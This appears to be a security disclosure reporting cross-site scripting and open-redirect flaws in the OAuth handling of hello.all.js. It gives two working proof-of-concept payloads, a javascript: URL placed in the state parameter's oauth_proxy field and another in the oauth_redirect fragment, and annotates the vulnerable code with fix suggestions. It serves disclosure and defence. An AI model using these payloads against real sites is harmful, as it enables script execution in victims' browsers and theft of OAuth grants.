Summary
I found that an attacker is able to perform cross-site scripting attacks because of unsafe redirects in multiple vulnerable code paths in hello.all.js
PoC
1 -?state={"oauth_proxy":"javascript:alert(document.domain)//"}&code=0
2 - #oauth_redirect=javascript:alert(1)
Vulnerable codes
else if ('oauth_redirect' in p) {
// NOTE(review): per PoC 2 above, oauth_redirect can be supplied in the URL fragment, so
// `url` is presumably attacker-controlled; confirm how `p` is populated (not shown in this excerpt).
var url = decodeURIComponent(p.oauth_redirect);
// The decoded value is handed to location.assign() with no scheme or origin check visible here.
// A javascript: URL therefore executes in this page's origin, and any other URL is an open redirect.
// A fix would parse the value (e.g. new URL(url, location.href)) and navigate only when the
// protocol is http:/https: and the host is one the application expects.
location.assign(url);
return;
}
if (p && p.state && (p.code || p.oauth_token)) {
// NOTE(review): per PoC 1 above, `state` can be supplied in the query string, so every field
// read from it below is presumably attacker-controlled; confirm how `p` is populated.
// JSON.parse also throws on malformed input and no try/catch is visible in this excerpt.
var state = JSON.parse(p.state);
// Add this path as the redirect_uri
p.redirect_uri = state.redirect_uri || location.href.replace(/[?#].*$/, '');
// Redirect to the host
// state.oauth_proxy becomes the base of the navigation target with no scheme or allow-list
// check visible here, so a javascript: value reaches location.assign() below.
// NOTE(review): `p` (including p.code / p.oauth_token) is passed to _this.qs together with that
// URL; presumably qs appends it as query parameters, which would also send the grant to whatever
// host oauth_proxy names. Verify against the qs implementation.
// A fix would accept only http:/https: proxy URLs that match a configured value.
var path = _this.qs(state.oauth_proxy, p);
location.assign(path);
return;
}